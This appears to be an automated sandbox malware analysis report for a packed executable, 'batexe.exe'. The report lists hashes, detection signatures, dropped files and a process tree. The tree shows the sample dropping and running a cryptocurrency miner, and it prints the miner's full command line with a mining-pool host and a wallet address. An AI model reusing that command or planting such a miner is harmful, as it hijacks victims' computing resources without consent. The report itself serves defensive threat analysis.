73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18/02/2024, 03:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3608	b2e.exe
3968	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3756-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3756 wrote to memory of 3608	3756	batexe.exe	72
PID 3756 wrote to memory of 3608	3756	batexe.exe	72
PID 3756 wrote to memory of 3608	3756	batexe.exe	72
PID 3608 wrote to memory of 4836	3608	b2e.exe	73
PID 3608 wrote to memory of 4836	3608	b2e.exe	73
PID 3608 wrote to memory of 4836	3608	b2e.exe	73
PID 4836 wrote to memory of 3968	4836	cmd.exe	76
PID 4836 wrote to memory of 3968	4836	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3756
- C:\Users\Admin\AppData\Local\Temp\ED0.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\ED0.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\ED0.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1558.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1558.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ED0.tmp\b2e.exe

Filesize
2.1MB

MD5
bc7879ccd445cde49fc5aa73f6a177d2

SHA1
c4489bbaad890644269c27ee330e560ed8e08c99

SHA256
8266eb39ced8792a734944a5f66393162f0d8b0c9ee3739d65ffe2f0e4403261

SHA512
7972cb130ce0b7b75eba2bea3caadb8fa15c37a03482cedaf31c1fed8ecc66297da479d59e461311465de84aaf13640b49440bd527769a7b62cfdfec9a1c0c55

Download Submit
C:\Users\Admin\AppData\Local\Temp\ED0.tmp\b2e.exe

Filesize
2.6MB

MD5
e259e386b218bf0cd7394856595d1ee4

SHA1
5fbb8881b23ed21828af2319bcda770701f73b52

SHA256
227efdc631068fede92edc4e3a1c8928517bbc369b393e4bdeffcd41b656ef96

SHA512
bc83f16cfa73ab4ff0e9d2dc43ee66788c91f6646510a8415d71d777864dda3ae1f11431473702bba06c794b622231a169c187e37b6dfe2660a71383ee77555d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
201KB

MD5
d48f2a534b704fc41f4540ef9115d6aa

SHA1
f5ad147b21dc32fa24f958de78caa14d29f2dd39

SHA256
a5c5a6b064aea9fbbe24aa04148b3d4e431accb54de44a9d67f0fefe0b5553bd

SHA512
171f71da3db8995da6dbcc328f1985520ba042144dfdecaa84264b260c46683017b427664643644c46e950db970cfe0e4c682e990345b33430b72da134b369fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
125KB

MD5
ce34ad779ef1b0e667d684ec1968eae7

SHA1
e55144ba0e41e56be2e2022306a0c339acab7714

SHA256
5239f928630450ee21cbebdaa6abae167e290b89cd758dcb99f9d2318e3add77

SHA512
ad65a086de05e68a79e0093b9d8ed3d98fdb53f10441ee4c8bc473fe03671acb6df6a2af2b20efed80bf547aafd9aa1b32d7e8ed408d0aa11a6641e7e8d4c01b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
156KB

MD5
f6e6452978ec385e2e09eb08c76cdd90

SHA1
95227cc0aa8b1ba37b0e22f693b1d1fb95780222

SHA256
dec41f8a4685a904be07b62ae6b7ed85fd5a2071dfd076b5df02ac074915c697

SHA512
cf01e6ef48ab9fd5e8c40957dfc5cd5ebfa5ff6cb059f91376bec42591194f6bd9d73f366663e029ca935d4edc7fb07bc343c8699e8dec209fc5fcda2cfe6dfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
98KB

MD5
a200e284cd5b252b91b08894c48f1cdf

SHA1
e9c60320462f038bc5d74760e9560e80cd7afd41

SHA256
27a4c179c95a076eeb44eefff35fc914e17408078d93b0e568f3f334bdab8ae4

SHA512
8570dcc8090c344b4338787525222510094a7ce002d61ad552f1aa26514a3e052f7804391666281cd9939a69f21312487b0441ad50c460a28808be584a1c8613

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
113KB

MD5
9860a17aa5411a375c13ddbdf650d113

SHA1
656c46761ffe32998c906fa354d9ad869802206e

SHA256
e860844a70c8758c2101e8fb8d8b2b176a4c358a9380d2992fdb01f3e6ce1104

SHA512
8342c485f6c399af1811ad51dfb41e2d8ba60854804976199776776ed1288a1ba12b0f0d5acf4014b00e8df8d29164c1d8671a068315b6472362b12bbaa67570

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
208KB

MD5
4d6aea3b3cf1054ab89de5680972da0a

SHA1
faa84b5ec5a9da7fff0040abfc9adf14a59478d8

SHA256
b5619f6e1737e23e7e3b4bb5fae3ce6c1bec36fc3e564f77bf5f872fbbfb276a

SHA512
0fe985c2c36287635ff6f0f474514aba4476ee010323a9e6c2af6d9292121fbb21012faedda4507b8fcb2bf05dc85629226f17dda11e2b9393dcea42ad8c8c0e

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
78KB

MD5
89b2709f9eaff229bc272319feb1e485

SHA1
0b084506b0e0e4ce61c40a7d3f7e759dbf04338d

SHA256
79625844d8dcdaf55bccb7b7738fff3476542176fe560edc2400cc731ae0615f

SHA512
89b18af7e9ef8e069e8464bb3a1aaddc94e161226c673d7ce5029fd297ee144443b90a9995b9f130a89fa87ddeafa06d840fde5f7a2e709d608af433a0284331

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
123KB

MD5
b9b6b73c3a732714d3285117f8c60faf

SHA1
fec56c751b70af92d3475252150d83629f3af847

SHA256
df72f6db183e20b09115bc617b6618fd0c31ee141c787f93b5c64540995d307d

SHA512
d7106f11a23a8e39ae649d8148bfba514e6ad0022cd999ee7c7c8088342487082de7bb69ddc03c0f553b001ca59e7dccbf5b5f6658544a3703aa71a1b7b24ea6

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
110KB

MD5
b2a46148767669b006a6e856d25176c0

SHA1
8f08a73b7a4285aef3a706184f309808f75fe007

SHA256
345bba19ecc803ac87b01cdf461973e158d4bd3b3644dd1566dbac4010eb7422

SHA512
74e3f7d50881e4e0a233d1e192c94688c2090ee049a8d6ce4834ba89cbbfcf101d7343b40db6b738b8eb160360c6f32fca471e6156e5095c8bbf8af7a318c55f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
41KB

MD5
1619933e133a39f6634db87f26dfe4ed

SHA1
3e4d9475420ac78d9bcfa67d988ae50dd1fa34f0

SHA256
a4801d934f527e9a5111f3d63a1db2ce346d8cb85fce2dbf2b7ebba3656f8aff

SHA512
2066a1adf776493c2e4fb05e49cb571959b2ecc53878417c91250dd038fd4d22337c194f8ed199c3df17392b2bf9ecdd54d549146489d4e9b64aadf0f025e080

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
163KB

MD5
6b96fb494dfd83d1a66c6a26b157b5b9

SHA1
5c28812fba9131b547077d9b0efb722312f0d6a1

SHA256
1ffc76de7188b58d497f37ea3e0b537985e66766b8d7b7dcfcba9703d62bd140

SHA512
a6e85950425e90f54967f9ded9a4e4e84e0998ba9a7c30b3609b633dc4f9b3652fff24db27625ad3508307b5116bdd38217cf3d5a1fed5c7f5fca5aa113d502b

Download Submit
memory/3608-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3608-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3756-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3968-58-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/3968-44-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/3968-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3968-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-63-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3968-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download